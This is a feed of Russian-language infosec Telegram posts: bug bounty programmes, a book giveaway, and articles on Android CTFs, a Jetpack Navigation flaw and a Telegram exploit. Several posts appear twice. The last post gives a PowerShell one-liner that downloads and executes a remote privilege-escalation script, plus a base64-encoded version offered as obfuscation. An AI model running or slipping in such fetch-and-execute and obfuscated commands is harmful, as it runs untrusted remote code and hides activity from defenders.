Forwarded from Cybred
Обстановка на Земле.
Кто-то шутит про разработчика, который пушнул в прод. Но как говорится "сегодня взлом, завтра атака".
Я вот припоминаю 2019. Тогда Cozy Bear сломали FireEye и распространили свою малварь под видом апдейта для "агента безопасности" SolarWinds Orion.
Кейс 1 в 1
Кто-то шутит про разработчика, который пушнул в прод. Но как говорится "сегодня взлом, завтра атака".
Я вот припоминаю 2019. Тогда Cozy Bear сломали FireEye и распространили свою малварь под видом апдейта для "агента безопасности" SolarWinds Orion.
Кейс 1 в 1
🔥20
Forwarded from infosecurity
⚡️Разыгрываем полезные книги по информационной безопасности и этичному хакингу (в бумажном варианте):
- Хакерство. Физические атаки с использованием хакерских устройств.
- Тестирование на проникновение с Kali Linux.
- Аппаратный хакинг: взлом реальных вещей.
- Black Hat Go: Программирование для хакеров и пентестеров.
- Black Hat Python: программирование для хакеров и пентестеров, 2-е изд.
• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (26.07 в 19:00) при помощи бота, который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на мой канал @tg_infosec;
2. Подписаться на канал моих друзей @poxek;
3. Нажать на кнопку «Участвовать».
Учитывайте, что бот может немного подвиснуть — не переживайте, просто нажмите еще раз на кнопку «Участвовать».
#Конкурс
- Хакерство. Физические атаки с использованием хакерских устройств.
- Тестирование на проникновение с Kali Linux.
- Аппаратный хакинг: взлом реальных вещей.
- Black Hat Go: Программирование для хакеров и пентестеров.
- Black Hat Python: программирование для хакеров и пентестеров, 2-е изд.
• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (26.07 в 19:00) при помощи бота, который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на мой канал @tg_infosec;
2. Подписаться на канал моих друзей @poxek;
3. Нажать на кнопку «Участвовать».
#Конкурс
🔥23
Forwarded from BI.ZONE Bug Bounty
Вас ждут:
+5% с каждым новым оплачиваемым отчетом и сохранение накопленного бонуса Bounty pass#1: Progress. Лимита на накопительный бонус нет.
+10% для каждого оплачиваемого отчета с 22 октября 2024 года по 21 октября 2025 года.
— Золотая награда за 10 оплаченных уязвимостей или сумма вознаграждений в размере 1 млн руб.
— Серебряная награда за 6 оплаченных уязвимостей или сумма вознаграждений в размере 600 тыс. руб.
— Бронзовая награда за 3 оплаченные уязвимости или сумма вознаграждений в размере 300 тыс. руб.
Каждая награда содержит уникальный набор мерча. Тип награды определяется по максимальному значению: либо количество уязвимостей, либо сумма вознаграждения.
Рейтинг багхантеров будет периодически обновляться в таблице олимпийцев. Результаты узнаем после 22 октября 2024 года.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9😁5
Forwarded from Mobile AppSec World (Yury Shabalin)
Статья для начинающих свой путь в Android
Всем привет!
Статейка для тех, кто только начинает свое знакомство с Android и хотел бы попробовать свои силы на нескольких CTF, чтобы понять какого это.
В статье описаны шаги для настройки окружения:
- Создание эмулятора
- Настройка Burpsuite
- Установка Frida
- Решение двух задачек с HackTheBox
В целом ничего особо примечательного, но как базовая точка для самого популярного вопроса «Как снять пиннинг» подойдет. Конечно, далеко не на всех приложениях эти шаги и этот скрипт сработают, но тем не менее, для старта неплохо.
Ну а дальше только снимать пиннинг и другие вещи с более сложных и не учебных приложений.
Добро пожаловать в мир безопасности мобилок»
#android #frida #ctf #burp
Всем привет!
Статейка для тех, кто только начинает свое знакомство с Android и хотел бы попробовать свои силы на нескольких CTF, чтобы понять какого это.
В статье описаны шаги для настройки окружения:
- Создание эмулятора
- Настройка Burpsuite
- Установка Frida
- Решение двух задачек с HackTheBox
В целом ничего особо примечательного, но как базовая точка для самого популярного вопроса «Как снять пиннинг» подойдет. Конечно, далеко не на всех приложениях эти шаги и этот скрипт сработают, но тем не менее, для старта неплохо.
Ну а дальше только снимать пиннинг и другие вещи с более сложных и не учебных приложений.
Добро пожаловать в мир безопасности мобилок»
#android #frida #ctf #burp
🔥10
Forwarded from Mobile AppSec World (Yury Shabalin)
Разбираемся с уязвимостью в Jetpack Navigation
Всем привет!
Относительно недавно многоуважаемый @OxFi5t подсветил исследование коллег из Positive Technologies про новый вектор атаки на Android через проблемы в библиотеке Jetpack . Спасибо огромное им за исследование, оно реально крутое!
Мы не смогли остаться в стороне, тоже немного покапались в исследовании, нашли пару интересных вещей, не освещенных в оригинальном материале и сегодня я представляю вашему вниманию результат наших трудов, статью "Разбираемся с новой уязвимостью в Android-библиотеке Jetpack Navigation".
Кроме технических деталей самой проблемы мы еще дополнительно проанализировали 1000 приложений из различных маркетов и собрали интересную статистику по подверженности данной проблеме. Если кратко, то 21% из исследованых нами приложений содержит уязвимую навигацию. Эксплуатабельны ли они это отдельный вопрос, который, я надеюсь, мы разберем в дальнейшем обязательно))
Если интересно исследование с цифрами, какие категории оказались наиболее подвержены данной проблеме - можно посмотреть у нас на сайте.
А пока - приятного чтения и спасибо еще раз коллегам за шикарную уязвимость!
#jetpack #stingray #navigation #issue #research
Всем привет!
Относительно недавно многоуважаемый @OxFi5t подсветил исследование коллег из Positive Technologies про новый вектор атаки на Android через проблемы в библиотеке Jetpack . Спасибо огромное им за исследование, оно реально крутое!
Мы не смогли остаться в стороне, тоже немного покапались в исследовании, нашли пару интересных вещей, не освещенных в оригинальном материале и сегодня я представляю вашему вниманию результат наших трудов, статью "Разбираемся с новой уязвимостью в Android-библиотеке Jetpack Navigation".
Кроме технических деталей самой проблемы мы еще дополнительно проанализировали 1000 приложений из различных маркетов и собрали интересную статистику по подверженности данной проблеме. Если кратко, то 21% из исследованых нами приложений содержит уязвимую навигацию. Эксплуатабельны ли они это отдельный вопрос, который, я надеюсь, мы разберем в дальнейшем обязательно))
Если интересно исследование с цифрами, какие категории оказались наиболее подвержены данной проблеме - можно посмотреть у нас на сайте.
А пока - приятного чтения и спасибо еще раз коллегам за шикарную уязвимость!
#jetpack #stingray #navigation #issue #research
🔥4😁3⚡1
Убойное видео. Как я написал эксплоит для бага в Telegram и что было дальше
#xakep #telegram #1click
Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)
🔓 Читать дальше
🌚 @poxek | 📹 YouTube
#xakep #telegram #1click
Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)
Недавно мне на глаза попался пост примерно такого содержания: «В Telegram выявлена новая уязвимость, связанная с загрузкой видеороликов». К посту прилагалась демонстрация: пользователь получает видео, при тапе по которому Telegram пытается установить стороннее приложение. При этом проблема не привлекла особенного внимания. Я решил разобраться, работает ли способ, и написать к нему эксплоит.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11😁4🌚1
Bug Bounty в России: как дела с белыми русскими хакерами?
#vk #vkbugbounty
Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)
Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.
➡️ Читать далее
🌚 @poxek | 📹 YouTube
#vk #vkbugbounty
Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)
Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7👾2
Forwarded from Standoff 365
В среду, 31 июля, в 19:00 (мск) можно будет в прямом эфире посмотреть на триаж с двух сторон: глазами компаний-вендоров и команды Standoff Bug Bounty.
🥣 Готовь вопросы или задавай их прямо под постом, а мы передадим все гостям студии, среди которых будут:
✨
✨ Дарья Афанасова — руководитель группы триажа на платформе Standoff Bug Bounty.
✨ Анатолий Иванов aka c0rv4x — идейный лидер багбаунти Standoff, белый хакер с десятилетним стажем.
Они поговорят о том, как триажеры помогают багхантерам правильно составлять отчеты и не упускать важного, чтобы оперативнее получать фидбэк и вознаграждение от вендоров. А еще обсудят, как триаж сокращает путь от получения отчета до устранения уязвимости.
Регистрируйся заранее, чтобы не пропустить стрим. Увидимся в эфире!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24
Forwarded from infosecurity
🎉 Результаты розыгрыша:
Победители:
1. Миша (@ponomarevmisha)
2. D1caprio (@P2Plegend)
3. Валерий (@valerixyz)
4. Розовый (@Chlypka)
5. Анютыч (@Annutych)
6. Dim (@DimGridAle)
7. степанк (@preteenbastard)
8. ctlh (@justsalohiddin)
9. Dmitrii (@romule090)
10. Антон (@amkashirin)
Проверить результаты
Победители:
1. Миша (@ponomarevmisha)
2. D1caprio (@P2Plegend)
3. Валерий (@valerixyz)
4. Розовый (@Chlypka)
5. Анютыч (@Annutych)
6. Dim (@DimGridAle)
7. степанк (@preteenbastard)
8. ctlh (@justsalohiddin)
9. Dmitrii (@romule090)
10. Антон (@amkashirin)
Проверить результаты
🔥13😁8
На 10к подписчиков ждите кое что классное 🌚
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))
С любовью, Похек❤️
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))
С любовью, Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁36👾6
#windows #privesc
Маленький воскресный пост про очередной небольшой скрипт для поиска мисконфигураций в Windows, которые приводят к повышению привилегий. Но тем не менее репа собрали более 500 звёзд, значит заслуживает внимания.
Эксплуатация:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")И вот простенькая обфускация:
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")'))
powershell -e $encodedPlease open Telegram to view this post
VIEW IN TELEGRAM
🔥13⚡2